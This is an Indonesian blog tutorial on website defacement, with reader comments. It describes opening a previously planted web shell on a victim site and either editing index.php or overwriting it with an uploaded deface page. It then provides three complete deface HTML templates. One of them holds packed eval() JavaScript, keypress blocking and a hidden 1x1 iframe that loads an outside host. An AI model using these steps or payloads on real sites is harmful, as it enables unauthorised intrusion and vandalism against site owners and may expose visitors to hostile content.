I'm Not Hacker Just Newbie: Tutor Deface

Oke..disini ane Cuma pengen memperlihatkan bagaimana cara melakukan sebuah deface pada sebuah web.

Sebelumnya apa sih pengertian deface itu??deface adalah kegiatan <illegal??> perubahan tampilan website,biasanya yang dirubah adalah file index.php

Ada beberapa cara untuk melakukan deface,bisa login dari hal administrator trus buat artikel baru yang diisi dengan script deface kita,atau tanam shell trus merubah total lewat shell kita tadi.kalau ane sih lebih suka cara ke 2,soalnya kalau kita nulis lewat hal admin tadi biasanya udah di filter untuk script HTML nya.

Pertama tama ane anggep temen2 semua dah tahu cara mencari “korban” dan masuk ke web tersebut,trus buka shell yang udah kita tanem tadi <devil mode on>

Trus kita cari dimana file index.php berada..biasanya sih di direktori yang ada tulisan www/

Kalau udah ketemu klik edit…

Keliatan kan isinya..dari sini kita udah bisa melakukan aktifitas deface yaitu dengan mengganti isi dari file index dengan script deface yang udah kita siapkan,cuman terkadang akses kita dibatasi,jadi kita gak bisa melakukan penggantian script

Eitss..tenang,masih ada cara lain kok,yaitu kita timpa file index tersebut dengan file index deface-an kita

Trus upload ke directory tempat file index berada ,tapi jangan lupa nama file yang kita upload harus sama dengan file index yang ada di server korban,selesai deh…liat hasilnya

Beberapa contoh script deface yang bisa dijadikan referensi kalau suka:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<title>[†] HACKED BY j0cK3R [†]</title>

</head>

<br><br><br><center><font color="#ff0000" face="Courier New">[†] HACKED BY j0cK3R [†]

<br><font color="#ff0000" face="Courier New">[†] FUCK U'R ADMIN [†]

<br><font color="#ffffff" face="Courier New">[†] PUNYA WEBSITE BAGUS THU DIBENERIN | i'm so sorry... [†]</center></ br>

SCROLLBAR-FACE-COLOR: #000000; SCROLLBAR-HIGHLIGHT-COLOR: #000000; SCROLLBAR-SHADOW-COLOR: #000000; SCROLLBAR-3DLIGHT-COLOR: #fffc00; SCROLLBAR-ARROW-COLOR: #fffc00; SCROLLBAR-TRACK-COLOR: #000000; SCROLLBAR-DARKSHADOW-COLOR: #fffc00

}

BODY {

CURSOR: crosshair

}

</style>

<Script Language='Javascript'>function keypressed() {;return false;}document.onkeydown=keypressed;// End --></script>

</object>

</html>

Atau

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>h4cked By j0ck3r : xinbiosys : P100M</title><link REL="SHORTCUT ICON" HREF="http://swararakyat.files.wordpress.com/2007/06/indonesia_flag.gif"><META NAME=Author CONTENT=XINCBIOsys><META NAME=Keywords CONTENT=><META NAME=Description CONTENT="j0ck3r was here #1"><script language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3/jquery.min.js"></script><script language="javascript" type="text/javascript" src="http://onehackoranother.com/projects/jquery/jquery-grab-bag/javascripts/jquery.text-effects.js"></script><style type="text/css">body,td,th { font-family:"Courier New", Courier, monospace;font-size: 12px; color: #009900; margin:0; padding:0; height:100%; overflow:hidden;}html { height:100%; width:100%;}body { background-color: #000000;}.teks { color:#00CC00; font-size:74px; font-weight:bold; font:"Times New Roman";}.teks2 { color:#00CC00; font-size:24px; font-weight:bold; font:"Times New Roman";}#i12 { position:absolute; top:30%; left:35%;}.theAbs { top:0; position:absolute; width:2%;}.hide { display:none;}#iHacked { position:absolute; width:100%; top:5%; height:100%; opacity:0.3;}li{ color:#fff; font:bold 13px; list-style: none;}</style><script language="javascript" type="text/javascript">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('i 9;$.8.7=n(b){i c={P:10,Q:2,F:10,1y:v,1h:v,19:\'1z\',C:\'1a\',K:r,G:r,D:v};k(!b)b=c;i d=$.1Z(c,b);9=$.8.7.1A();E 1B.20(n(){i a=$(1B);k(d.D){d.1C={Z:a.g(\'Z\'),11:a.g(\'11\'),12:a.g(\'12\'),s:a.g(\'s\'),l:a.g(\'l\'),y:a.g(\'y\'),1D:a.g(\'t-u\'),1E:a.g(\'z-1F\')}}a.g(\'Z\',\'21\');d.1G=a.g(\'t-u\');1i(d.C){A\'1b\':$.8.7.1j(a,d);B;A\'1k\':$.8.7.1l(a,d);B;A\'13\':$.8.7.1m(a,d);B;A\'14\':$.8.7.1n(a,d);B;22:$.8.7.1o(a,d)}})};$.8.7.1A=n(){i h,w;k(1p 1q.1H!=\'1r\'){h=1q.1H;w=1q.23}H k(1p T.16!=\'1r\'&&1p T.16.1c!=\'1r\'&&T.16.1c!=0){h=T.16.1c;w=T.16.1I}H{h=T.1J(\'I\')[0].1c;w=T.1J(\'I\')[0].1I}i a={q:1s 1t(h,R.V(h/2),R.V(h/5)),m:1s 1t(w,R.V(w/2),R.V(w/5))};E a};$.8.7.j=n(a,b,c){k(a&&b&&(b>a)){i d=a;a=b;b=d}k(a==b)E a;i e=R.V(R.1a()*a);k(b&&e<b){1u(e<b)e=R.V(R.1a()*a)}E c?e-c:e};$.8.7.K=n(){i a=\'24\';i b=\'\';1u(b.25<6)b+=a.26($.8.7.j(6));E b};$.8.7.1v=n(){i a,l;i b=$.8.7.j(4)+1;1u(b>4)b=$.8.7.j(4)+1;1i(b){A 1:a=$.8.7.j(9.q[0]-9.q[1],9.q[1]-9.q[2]);l=$.8.7.j(9.m[1]);B;A 2:a=$.8.7.j(9.q[0],9.q[1]+9.q[2]);l=$.8.7.j(9.m[0]+9.m[1],9.m[1]+9.m[2]);B;A 3:a=$.8.7.j(9.q[2],0,9.q[1]);l=$.8.7.j(9.m[0]+9.m[1],9.m[1]+9.m[2]);B;A 4:a=$.8.7.j(9.q[2],0,9.q[1]);l=$.8.7.j(9.m[1]-9.m[2],0,9.m[2]);B}E 1s 1t(a,l)};$.8.7.W=n(a,b,c,d,e){i f,t;k(d.1y)f=$.8.7.j(d.F);H f=d.F;k(d.1h)t=d.19;H t=a.g(\'t-u\');a.1w({27:\'1d%\',1e:0,l:c,s:b,28:t},(f*29),n(){$.8.7.U(a,d,e-1)})};$.8.7.U=n(a,b,c){a.g(\'t-u\',b.1G);k(c>0){a.g(\'11\',\'2a\');a.1w({1e:1d},1);a.g(\'12\',\'\');k(b.K)a.g(\'y\',$.8.7.K())}H k(c<=0){k(b.D){i d=b.1C;a.1w({1e:1d},1);a.g(\'1e\',\'1d\');a.g(\'Z\',d.Z);a.g(\'11\',d.11);a.g(\'12\',d.12);a.g(\'s\',d.s);a.g(\'l\',d.l);a.g(\'y\',d.y);a.g(\'t-u\',d.1D);a.g(\'z-1F\',d.1E)}k(b.G){a.2b()}E r}1i(b.C){A\'1b\':a.g(\'s\',9.q[1]);a.g(\'l\',9.m[1]);$.8.7.1j(a,b,c);B;A\'1k\':i e=$.8.7.1v();a.g(\'s\',e[0]);a.g(\'l\',e[1]);$.8.7.1l(a,b,c);B;A\'13\':a.g(\'s\',0);a.g(\'l\',$.8.7.j(9.m[0]));$.8.7.1m(a,b,c);B;A\'14\':a.g(\'s\',9.q[0]);a.g(\'l\',$.8.7.j(9.m[0]));$.8.7.1n(a,b,c);B;A\'1a\':a.g(\'s\',0);a.g(\'l\',0);$.8.7.1o(a,b,c);B}};$.8.7.1o=n(a,b,c){i d,s,1f,1g;k(!c){$.8.7.U(a,b,$.8.7.j(b.P,b.Q));E r}d=$.8.7.j(9.m[0]);s=$.8.7.j(9.q[0]);a.g(\'s\',s);a.g(\'l\',d);1f=$.8.7.j(9.m[0],9.m[2]);1g=$.8.7.j(9.q[0],9.q[2]);d=($.8.7.j(2)%2==0)?(d-1f):(d+1f);s=($.8.7.j(2)%2==0)?(s-1g):(s+1g);$.8.7.W(a,s,d,b,c)};$.8.7.1j=n(a,b,c){k(!c){$.8.7.U(a,b,$.8.7.j(b.P,b.Q));E r}i d=$.8.7.1v();$.8.7.W(a,d[0],d[1],b,c)};$.8.7.1l=n(a,b,c){k(!c){$.8.7.U(a,b,$.8.7.j(b.P,b.Q));E r}$.8.7.W(a,9.q[1],9.m[1],b,c)};$.8.7.1m=n(a,b,c){k(!c){$.8.7.U(a,b,$.8.7.j(b.P,b.Q));E r}i d=$.8.7.j(3);k(a.1K(\'J\').1L(\'2c\')>=0)d=a.g(\'l\');H k(d==1)d=a.g(\'l\')+$.8.7.j(9.m[2]);H k(d==2)d=a.g(\'l\')-$.8.7.j(9.m[2]);H d=a.g(\'l\');i e=$.8.7.j((9.q[0]+9.q[2]),9.q[0]);$.8.7.W(a,e,d,b,c)};$.8.7.1n=n(a,b,c){k(!c){$.8.7.U(a,b,$.8.7.j(b.P,b.Q));E r}i d=$.8.7.j(3);k(a.1K(\'J\').1L(\'2d\')>=0)d=a.g(\'l\');H k(d==1)d=a.g(\'l\')+$.8.7.j(9.m[2]);H k(d==2)d=a.g(\'l\')-$.8.7.j(9.m[2]);H d=a.g(\'l\');i e=$.8.7.j(9.q[2],0,9.q[1]);$.8.7.W(a,e,d,b,c)};$.8.7.2e=n(){i a={C:\'1b\',F:10,Q:2,P:6,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1M" N="t-u:Y;y:#1N">.</p>\')}$(\'.1M\').7(a)};$.8.7.2f=n(){i a={C:\'1b\',F:3,1O:1,1P:1,D:r,G:v};L(i x=0;x<2g;x++){$(\'I\').M(\'<p J="1Q" N="t-u:Y;y:#17\'+(x%2==0?\'17\':\'18\')+\'18">\'+(x%2==0?\'0\':\'1\')+\'</p>\')}$(\'.1Q\').7(a)};$.8.7.2h=n(){i a={C:\'1k\',F:10,1O:2,1P:6,D:r,19:\'2i\',G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1R" N="t-u:2j;y:#2k">.</p>\')}$(\'.1R\').7(a)};$.8.7.2l=n(){i a={C:\'13\',F:10,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1S" N="t-u:2m;y:#1N">*</p>\')}$(\'.1S\').7(a)};$.8.7.2n=n(){i a={C:\'13\',F:3,K:r,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1T" N="t-u:Y;y:#1U">\\\'</p>\')}$(\'.1T\').7(a)};$.8.7.2o=n(){i a={C:\'13\',F:6,K:r,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1V" N="t-u:Y;y:#\'+(x%2==0?\'18\':\'17\')+\'2p">&#2q;<1x />&#2r;<1x />&#2s<1x />&#2t</p>\')}$(\'.1V\').7(a)};$.8.7.2u=n(){i a={C:\'14\',F:6,K:r,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1W" N="t-u:Y;y:#17\'+(x%2==0?\'17\':\'18\')+\'18">^</p>\')}$(\'.1W\').7(a)};$.8.7.2v=n(){i a={C:\'14\',Q:1,P:1,F:15,K:v,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1X" N="t-u:Y">O</p>\')}$(\'.1X\').7(a)};$.8.7.2w=n(a){i a={C:\'14\',19:\'1z\',K:r,1h:r,D:r,G:v};L(i x=0;x<S;x++){$(\'I\').M(\'<p J="1Y" N="t-u:2x;y:#1U">\'+(x%2==0?\'O\':\'o\')+\'</p>\')}$(\'.1Y\').7(a)}',62,158,'|||||||fly|fn|fly_dimensions|||||||css||var|getRandomValue|if|left|Width|function|||Height|false|top|font|size|true|||color||case|break|movement|reset|return|rotationSpeed|destroy|else|body|class|randomColor|for|append|style||maxRotations|minRotations|Math|75|document|resetObj|floor|animateObj||12pt|position||visibility|display|fall|float||documentElement|FF|00|maxTextSize|random|explode|clientHeight|100|opacity|move_left|move_top|expandText|switch|moveExplode|implode|moveImplode|moveFall|moveFloat|moveRandom|typeof|window|undefined|new|Array|while|getRandomQuadrent|animate|br|rotationRandom|8em|getBrowserDimensions|this|oldCss|fontsize|zindex|index|originalFont|innerHeight|clientWidth|getElementsByTagName|attr|indexOf|fly_starfield|FFF|minRotation|maxRotation|fly_explode|fly_hole|fly_blizzard|fly_rain|ff00|fly_matrix|fly_fire|fly_balloons|fly_bubble|extend|each|absolute|default|innerWidth|0369CEF|length|charAt|width|fontSize|1000|visible|remove|_rain|_fire|starfield|explosion|50|blackhole|1px|5em|ff0|blizzard|14pt|rain|matrix|FF00|165|167|182|163|fire|balloons|bubbles|8pt'.split('|'),0,{}));$(document).ready(function(){$('#i1').fadeIn(5000).animate( { fontSize:"1px" } , 2000 ).fadeOut(); $.fn.fly.bubbles(); sumpahPemuda();});function bacaDuluOm(){alert("Ini rasa prihatin kami kepada Negeri kita tercinta ini!!!\n\nHargai kerja keras kami untuk menyelamatkan infrastruktur IT Indonesia"); alert("Kami bukan mengumbar kemarahan, tapi kami mencoba berjuang sebagai orang yang cinta kepada INDONESIA"); return false;}function sumpahPemuda(){ setTimeout(function(){$('#sp1').typewriter().fadeIn();}, 7000); setTimeout(function(){$('#sp2').typewriter().fadeIn();}, 11000); setTimeout(function(){$('#sp3').typewriter().fadeIn();}, 23000); setTimeout(function(){$('#sp4').typewriter().fadeIn();}, 35000); setTimeout(function(){$('.explode').fly({movement:'float',randomColor:true,destroy:true});}, 48000); setTimeout(function(){$.fn.fly.explosion();}, 50000); setTimeout(function(){hacked();$('#theCredits').fadeIn();animate();}, 45000); }function hacked(){ setTimeout(function(){$('#iHacked').fadeIn(1000);}, 500); setTimeout(function(){$('#iHacked').fadeOut();}, 1000); setTimeout(function(){hacked()});}function stayHere(){ self.focus();return false;}</script></head><body onunload="bacaDuluOm();"><table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td align="center"> <div id="iHacked" class="hide"><img src="http://img18.imageshack.us/img18/799/hackedqr.png" /></div> <div id="i1" class="teks" style="display:none">--==PADAMU NEGERI==--</div> <div id="sp1" class="hide teks explode"> warning 4 u </div> <div id="sp2" class="hide teks2 explode">aku adalah bagian dari kumpulan orang-orang yang menghargai keamanan. </div> <div id="sp3" class="hide teks2 explode">aku tidak ingin indonesia hancur oleh orang-orang yang bodoh diluar sana </div> <div id="sp4" class="hide teks2 explode">jayalah indonesia,amankan infrastruktur negara dan keamanannya </div> <ul id="theCredits" style="display:none"> <li>j0ck3r</li> <li>j0ck3r</li> <li>j0ck3r</li> <li>hacker indonesia</li> </ul> </td> </tr></table><iframe src="http://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>

</body><script language="javascript" type="text/javascript">var x = new Array();var y = new Array();var z = new Array();var items = $('li');function animate(){ for(i = items.length - 1; i >= 0; i--){ var xVar = 50 + x[i];var yVar = 50 + y[i] * z[i]++;var zVar = 10 * z[i]++;if (!xVar | xVar < 0 | xVar > 90| yVar < 0 | yVar > 90 | zVar < 0 | zVar > 1500){x[i]= Math.random() * 2 - 1;y[i] = Math.random() * 2 - 1;z[i] = 2; }else{$(items[i]).css("position", "absolute");$(items[i]).css("top", xVar+"%");$(items[i]).css("left", yVar+"%");$(items[i]).css("fontSize", zVar+"%");$(items[i]).css("opacity",(zVar)/5000);}}setTimeout(animate, 9);}</script></html>

Atau

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<head>

<title>Hacked | By | Adit83</title>

<!--

body {

background-color: #000000;

}

body,td,th {

color: #00FF00;

font-family: Courier New, Courier, monospace;

}

a:link {

color: #00FF00;

text-decoration: none;

}

a:visited {

text-decoration: none;

color: #00FF00;

}

a:hover {

text-decoration: none;

color: #000000;

}

a:active {

text-decoration: none;

color: #00FF00;

}

-->

</style></head>

<body>

<p>Thanx For : all member of situstarget and HN, Neodark

<br />to my lovely girlfriend farah</p>

<p>Visit : <a href="http://www.raditya.uni.cc">My Blogs</a></p>

</div>

</body>

</html>

8 komentar:

Unknown mengatakan...: Om ajarin dong om yg beginian, saya bener2 newbie kgk bisa sama sekali, :( oiya domisili dmn Om j0ke3r!!; 29 Juni 2012 pukul 00.13
Anonim mengatakan...: Wkwkwkwk Kgx Bisa Di Copy Paste Mass; 9 Juli 2012 pukul 13.17
Anonim mengatakan...: owakkwkawa, di kasih sc nya tapi ga bisa di copy mas qq ,, sama aja boong; 27 September 2012 pukul 11.50
Michiru mengatakan...: Blogg Tololl DiKasih Script'a ,Tapi Ga bsa Dicopyy ( BLog Anjing , Tolol ,goblok, Dongo ..; 24 November 2012 pukul 09.15
j0ck3r mengatakan...: @irsal kaskus>>>terima kasih cacian anda om,sudah banyak yg mencaci seperti itu,itu makin menunjukkan betapa anda adalah tukang copy pste tulisan di blog orang-orang :); 13 Januari 2013 pukul 15.31
who am I? mengatakan...: makasih om, bisa dicopas :P
wkwkwkwkkwkwkwk; 9 Februari 2013 pukul 21.34
Mahasiswa salah jurusan mengatakan...: klo yg yg ROMANTIS punya ga om?
awoawokawok..; 21 Maret 2013 pukul 14.05
Anonim mengatakan...: Admin Yang Ngebikin itu SiapahKah Nama nya ?
klo mgg anda Admin nya ? Tolong Bales Komentar Saya .
Saya Pengen Lebih Tau Lagi Tentang Ini .; 18 Desember 2013 pukul 16.01

Tutor Deface

8 komentar:

Posting Komentar